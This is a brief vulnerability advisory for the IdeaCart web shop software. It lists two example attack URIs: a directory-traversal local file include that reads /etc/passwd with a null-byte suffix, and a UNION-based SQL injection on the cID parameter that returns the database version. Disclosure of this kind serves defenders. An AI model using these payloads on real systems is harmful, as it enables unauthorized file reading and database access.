IdeaCart Local File Include and SQL Injection Vulnerabilities

IdeaCart Local File Include and SQL Injection Vulnerabilities

Attackers can exploit these issues with a web browser.

The following example URIs are available:

http://www.example.com/index.php?page=../../../../../../../../../etc/passwd%00
http://www.example.com/secure/index.php?cID=1%20union%20select%201,2,3,4,5,6,@@version,8%23